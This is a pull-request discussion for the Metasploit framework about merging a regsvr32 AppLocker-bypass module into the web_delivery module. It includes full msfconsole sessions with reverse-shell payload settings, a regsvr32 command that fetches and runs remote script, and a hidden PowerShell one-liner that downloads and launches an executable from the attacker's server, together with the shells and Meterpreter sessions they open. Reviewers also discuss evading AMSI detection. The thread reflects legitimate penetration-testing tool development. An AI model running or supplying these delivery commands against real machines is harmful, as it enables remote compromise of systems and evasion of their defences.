Web Delivery (Merge regsvr32_applocker_bypass_server & Add PSH(Binary EXE))
rapid7/metasploit-framework pull request #8933
Opened 2017-09-07 08:37 UTC by g0tmi1k

- Merge in module `exploits/windows/misc/regsvr32_applocker_bypass_server.rb` as it performs in the same manner as web_delivery.rb
- Add a new target `PSH (Binary EXE)` to allows `EXE::Custom` option to be set.
- Add proxy removal option for PowerShell command output

- - -

## Regsvr32 

...aka `regsvr32_applocker_bypass_server.rb`

```
root@kali:~/metasploit-framework# rm /root/.msf4/config 
root@kali:~/metasploit-framework# ./msfconsole -q
msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 3
target => 3
msf exploit(web_delivery) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(web_delivery) > set lhost 192.168.103.180
lhost => 192.168.103.180
msf exploit(web_delivery) > options 

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.103.180  yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   3   Regsvr32

msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.103.180:4444 
[*] Using URL: http://0.0.0.0:8080/ri7pXHZDb
[*] Local IP: http://192.168.103.180:8080/ri7pXHZDb
[*] Server started.
[*] Run the following command on the target machine:
regsvr32 /s /n /u /i:http://192.168.103.180:8080/ri7pXHZDb.sct scrobj.dll
msf exploit(web_delivery) >

C:\Users\lab>regsvr32 /s /n /u /i:http://192.168.103.180:8080/ri7pXHZDb.sct scrobj.dll
C:\Users\lab>

msf exploit(web_delivery) > [*] 192.168.103.128  web_delivery - Handling .sct Request
[*] 192.168.103.128  web_delivery - Delivering Payload
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.103.128
[*] Command shell session 1 opened (192.168.103.180:4444 -> 192.168.103.128:1156) at 2017-09-07 04:32:44 -0400

msf exploit(web_delivery) > 
```

- - - 

## PSH (Binary EXE)

```
msf exploit(web_delivery) > set target 4
target => 4
msf exploit(web_delivery) > set disablepayloadhandler true
disablepayloadhandler => true
msf exploit(web_delivery) > set exe::custom /usr/share/windows-binaries/nc.exe 
exe::custom => /usr/share/windows-binaries/nc.exe
msf exploit(web_delivery) > jobs -K
Stopping all jobs...

[*] Server stopped.
msf exploit(web_delivery) > options 

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.103.180  yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   4   PSH (Binary EXE)

msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Using URL: http://0.0.0.0:8080/ebuEMq9lcj
[*] Local IP: http://192.168.103.180:8080/ebuEMq9lcj
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $z=echo ($env:temp+'\2fGt1V9k.exe');(new-object System.Net.WebClient).DownloadFile('http://192.168.103.180:8080/ebuEMq9lcj', "$z");invoke-item $z
msf exploit(web_delivery) > [*] 192.168.103.128  web_delivery - Using custom payload /usr/share/windows-binaries/nc.exe, RHOST and RPORT settings will be ignored!
[*] 192.168.103.128  web_delivery - Delivering Payload

msf exploit(web_delivery) > 

C:\Users\lab>powershell.exe -nop -w hidden -c $z=echo ($env:temp+'\2fGt1V9k.exe');(new-object System.Net.WebClient).DownloadFile('http://192.168.103.180:8080/ebuEMq9lcj', "$z");invoke-item $z
*Closes*

msf exploit(web_delivery) > [*] 192.168.103.128  web_delivery - Using custom payload /usr/share/windows-binaries/nc.exe, RHOST and RPORT settings will be ignored!
[*] 192.168.103.128  web_delivery - Delivering Payload

msf exploit(web_delivery) > 

* New window opens on the Windows machine _Netcat prompt_*
Cmd Line: 
```

2017-09-09 20:03 UTC, sempervictus requested changes
Thanks as always sir - this is quite a rational consolidation. Any thoughts on moving some of the functionality into the included namespaces or even Rex?
If possible I'd like to ask for the invoke call to be removed, or can PR on your branch if you'd prefer (not 100% sure this will trip, but so far invoke calls have been a red flag in my testing of AMSI assisted defense).

2017-09-09 20:03 UTC, sempervictus commented on modules/exploits/multi/script/web_delivery.rb
> +        #download_string = Rex::Powershell::PshMethods.download(url, "$z")  # Can't use, due to single vs double quotes in the URL
This may already be addressed in Rex, I've rewired how some of the quotes are handled. Will try to get the framework PR done asap. Secondly, since when are non-url-encoded quotes legal in HTTP URLs, or am I misunderstanding this comment?

2017-09-09 20:03 UTC, sempervictus commented on modules/exploits/multi/script/web_delivery.rb
> +        download_and_run = "$z=#{file};#{ignore_cert}#{download_string};invoke-item $z"
This is likely to trip AMSI, and another reason to try and use Rex for PSH gen. Invoke calls are no longer our friends :-(. I'm trying to keep the evasions legible and syntactically compatible across as many PSH revisions as I can. Would suggest peeking at the latest PRs there as I'd like to avoid replicating and describing the approach too much to hopefully increase its viable lifetime (actually curious to see how they handle this as its the same way a ton of legit PSH works).

2017-09-22 16:31 UTC, g0tmi1k commented on modules/exploits/multi/script/web_delivery.rb
> +        download_and_run = "$z=#{file};#{ignore_cert}#{download_string};invoke-item $z"
Already made a PR, but that's also waiting on being merged: https://github.com/rapid7/rex-powershell/pull/10

2017-09-22 16:32 UTC, g0tmi1k commented on modules/exploits/multi/script/web_delivery.rb
> +        #download_string = Rex::Powershell::PshMethods.download(url, "$z")  # Can't use, due to single vs double quotes in the URL
I believe its addressed in this? https://github.com/rapid7/rex-powershell/pull/10

2017-09-22 16:33 UTC, g0tmi1k commented
@sempervictus there is already stuff wanting to be moved to Rex ~ https://github.com/rapid7/rex-powershell/pull/10

2017-09-25 12:25 UTC, g0tmi1k commented on modules/exploits/multi/script/web_delivery.rb
> +        download_and_run = "$z=#{file};#{ignore_cert}#{download_string};invoke-item $z"
Pull request: https://github.com/rapid7/rex-powershell/pull/11

2017-10-05 07:42 UTC, g0tmi1k commented
REX has been merged in by @bcook-r7.

Anything I can do to help move this forward?

2017-10-25 17:58 UTC, jmartin-r7 commented on modules/exploits/multi/script/web_delivery.rb
> +        download_string = Rex::Powershell::PshMethods.download_run(url, file})
typo? `(url, file})` would be `(url, file)`

2017-10-25 18:05 UTC, jmartin-r7 commented on modules/exploits/multi/script/web_delivery.rb
> +      return generate_psh_command_line(noprofile: true,
I know style preference and you are just keeping existing, please make this one line there are lots longer lines in file.

2017-10-25 19:07 UTC, merged

2017-10-25 19:52 UTC, jmartin-r7 commented
## Release Note

Consolidate modules windows/misc/regsvr32_applocker_bypass_server.rb and exploits/multi/script/web_delivery.rb into a single module to reduce code duplication.

2017-10-25 21:21 UTC, jmartin-r7 commented
Had to revert this due to issues with rspec and payloads, will open a new PR to restore it.

2017-10-26 12:46 UTC, g0tmi1k commented
Is there anything I can do to help? Should I open a new PR?

https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/multi/script/web_delivery.rb

2017-10-26 14:29 UTC, jmartin-r7 commented
I am looking at how to solve the rspec failures now, after applying my comment for the error on line 166, running bundle to get the rex-powershell updated gem, and executing `./tools/modules/update_payload_cached_sizes.rb` to update for new payload sized there are still the following spec errors.

This suggests either an error in rex-powershell or a change in expectations for only some test.  I am investigating as the former at the moment.

```
Msf::Exploit::Powershell ......F....F...............................................................F............................F....................................................F..FF..........................F.....................................F.................................................................................FF........................................F.......F...................................................................F..................F.................................................

  1) Msf::Exploit::Powershell::cmd_psh_payload when use single quotes should wrap in single quotes
     Failure/Error: expect(code.include?(' -c \'')).to be_truthy

       expected: truthy value
            got: false
     # ./spec/lib/msf/core/exploit/powershell_spec.rb:402:in `block (4 levels) in <top (required)>'

  2) Msf::Exploit::Powershell::cmd_psh_payload when method is msil should raise an exception
     Failure/Error: expect(except).to be_truthy

       expected: truthy value
            got: false
     # ./spec/lib/msf/core/exploit/powershell_spec.rb:323:in `block (4 levels) in <top (required)>'

  3) Msf::Exploit::Powershell::generate_psh_args should generate correct arguments for {:encodedcommand=>"parp", :executionpolicy=>"bypass", :inputformat=>"xml", :file=>"x", :noexit=>true, :nologo=>true, :noninteractive=>true, :mta=>true}
     Failure/Error: expect(short_args.count('-')).to eql opt_length

       expected: 13
            got: 12

       (compared using eql?)
     # ./spec/lib/msf/core/exploit/powershell_spec.rb:471:in `block (5 levels) in <top (required)>'

  4) Msf::Exploit::Powershell::generate_psh_args should generate correct arguments for {:encodedcommand=>"parp", :executionpolicy=>"bypass", :inputformat=>"xml", :file=>"x", :noexit=>true, :nologo=>true, :noninteractive=>true}
     Failure/Error: expect(short_args.count('-')).to eql opt_length

       expected: 13
            got: 12

       (compared using eql?)
     # ./spec/lib/msf/core/exploit/powershell_spec.rb:471:in `block (5 levels) in <top (required)>'

  5) Msf::Exploit::Powershell::generate_psh_args should generate correct arguments for {:encodedcommand=>"parp", :executionpolicy=>"bypass", :inputformat=>"xml"}
     Failure/Error: expect(short_args.count('-')).to eql opt_length

       expected: 13
            got: 12

       (compared using eql?)
     # ./spec/lib/msf/core/exploit/powershell_spec.rb:471:in `block (5 levels) in <top (required)>'

  6) Msf::Exploit::Powershell::generate_psh_args should generate correct arguments for {:encodedcommand=>"parp", :executionpolicy=>"bypass", :inputformat=>"xml", :file=>"x", :noexit=>true, :nologo=>true}
     Failure/Error: expect(short_args.count('-')).to eql opt_length

       expected: 13
            got: 12

       (compared using eql?)
     # ./spec/lib/msf/core/exploit/powershell_spec.rb:471:in `block (5 levels) in <top (required)>'

  7) Msf::Exploit::Powershell::generate_psh_args should generate correct arguments for {:encodedcommand=>"parp", :executionpolicy=>"bypass", :inputformat=>"xml", :file=>"x", :noexit=>true, :nologo=>true, :noninteractive=>true, :mta=>true, :outputformat=>"xml", :sta=>true, :noprofile=>true}
     Failure/Error: expect(short_args.count('-')).to eql opt_length

       expected: 13
            got: 12

       (compared using eql?)
     # ./spec/lib/msf/core/exploit/powershell_spec.rb:471:in `block (5 levels) in <top (required)>'

  8) Msf::Exploit::Powershell::generate_psh_args should generate correct arguments for {:encodedcommand=>"parp", :executionpolicy=>"bypass", :inputformat=>"xml", :file=>"x", :noexit=>true}
     Failure/Error: expect(short_args.count('-')).to eql opt_length

       expected: 13
            got: 12

       (compared using eql?)
     # ./spec/lib/msf/core/exploit/powershell_spec.rb:471:in `block (5 levels) in <top (required)>'

  9) Msf::Exploit::Powershell::generate_psh_args should generate correct arguments for {:encodedcommand=>"parp", :executionpolicy=>"bypass", :inputformat=>"xml", :file=>"x", :noexit=>true, :nologo=>true, :noninteractive=>true, :mta=>true, :outputformat=>"xml"}
     Failure/Error: expect(short_args.count('-')).to eql opt_length

       expected: 13
            got: 12

       (compared using eql?)
     # ./spec/lib/msf/core/exploit/powershell_spec.rb:471:in `block (5 levels) in <top (required)>'

  10) Msf::Exploit::Powershell::generate_psh_args should generate correct arguments for {:encodedcommand=>"parp", :executionpolicy=>"bypass"}
      Failure/Error: expect(short_args.count('-')).to eql opt_length

        expected: 13
             got: 12

        (compared using eql?)
      # ./spec/lib/msf/core/exploit/powershell_spec.rb:471:in `block (5 levels) in <top (required)>'

  11) Msf::Exploit::Powershell::generate_psh_args should generate correct arguments for {:encodedcommand=>"parp", :executionpolicy=>"bypass", :inputformat=>"xml", :file=>"x", :noexit=>true, :nologo=>true, :noninteractive=>true, :mta=>true, :outputformat=>"xml", :sta=>true}
      Failure/Error: expect(short_args.count('-')).to eql opt_length

        expected: 13
             got: 12

        (compared using eql?)
      # ./spec/lib/msf/core/exploit/powershell_spec.rb:471:in `block (5 levels) in <top (required)>'

  12) Msf::Exploit::Powershell::generate_psh_args should generate correct arguments for {:encodedcommand=>"parp"}
      Failure/Error: expect(short_args.count('-')).to eql opt_length

        expected: 13
             got: 12

        (compared using eql?)
      # ./spec/lib/msf/core/exploit/powershell_spec.rb:471:in `block (5 levels) in <top (required)>'

  13) Msf::Exploit::Powershell::generate_psh_args should generate correct arguments for {:encodedcommand=>"parp", :executionpolicy=>"bypass", :inputformat=>"xml", :file=>"x"}
      Failure/Error: expect(short_args.count('-')).to eql opt_length

        expected: 13
             got: 12

        (compared using eql?)
      # ./spec/lib/msf/core/exploit/powershell_spec.rb:471:in `block (5 levels) in <top (required)>'

  14) Msf::Exploit::Powershell::generate_psh_args should generate correct arguments for {:encodedcommand=>"parp", :executionpolicy=>"bypass", :inputformat=>"xml", :file=>"x", :noexit=>true, :nologo=>true, :noninteractive=>true, :mta=>true, :outputformat=>"xml", :sta=>true, :noprofile=>true, :windowstyle=>"hidden", :command=>"Z"}
      Failure/Error: expect(short_args.count('-')).to eql opt_length

        expected: 13
             got: 12

        (compared using eql?)
      # ./spec/lib/msf/core/exploit/powershell_spec.rb:471:in `block (5 levels) in <top (required)>'

  15) Msf::Exploit::Powershell::generate_psh_args should generate correct arguments for {:encodedcommand=>"parp", :executionpolicy=>"bypass", :inputformat=>"xml", :file=>"x", :noexit=>true, :nologo=>true, :noninteractive=>true, :mta=>true, :outputformat=>"xml", :sta=>true, :noprofile=>true, :windowstyle=>"hidden"}
      Failure/Error: expect(short_args.count('-')).to eql opt_length

        expected: 13
             got: 12

        (compared using eql?)
      # ./spec/lib/msf/core/exploit/powershell_spec.rb:471:in `block (5 levels) in <top (required)>'
```

2017-10-26 20:14 UTC, jmartin-r7 commented
Came down to unit tests updates needed due to behavior changes in rex-powershell that had already been applied to the unit test in the external library from completely different PR.  These unit test changes became a dependency for update of the rex-powershell gem.

New PR opened.

2017-11-01 15:35 UTC, jmartin-r7 commented
### Release Note

Merge `windows/misc/regsvr32_applocker_bypass_server.rb` into `multi/script/web_delivery.rb` to take advantage to common functionality.

2017-11-03 20:23 UTC, vipzen commented
Working fine even with XP SP3 + PhS 2.0. Well done.

``msf exploit(web_delivery) > run
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.35:8081 
msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8080/sRC0U81JP
[*] Local IP: http://192.168.1.35:8080/sRC0U81JP
[*] Server started.
[*] Run the following command on the target machine:
regsvr32 /s /n /u /i:http://192.168.1.35:8080/sRC0U81JP.sct scrobj.dll
[*] 192.168.1.30     web_delivery - Handling .sct Request
[*] 192.168.1.30     web_delivery - Delivering Payload
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (179296 bytes) to 192.168.1.30
[*] Meterpreter session 1 opened (192.168.1.35:8081 -> 192.168.1.30:2453) at 2017-11-03 18:20:19 -0200

msf exploit(web_delivery) > sessions 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : XPSP3PTBR
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : REDE
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >

2017-11-21 12:49 UTC, g0tmi1k commented
thanks all! 🥇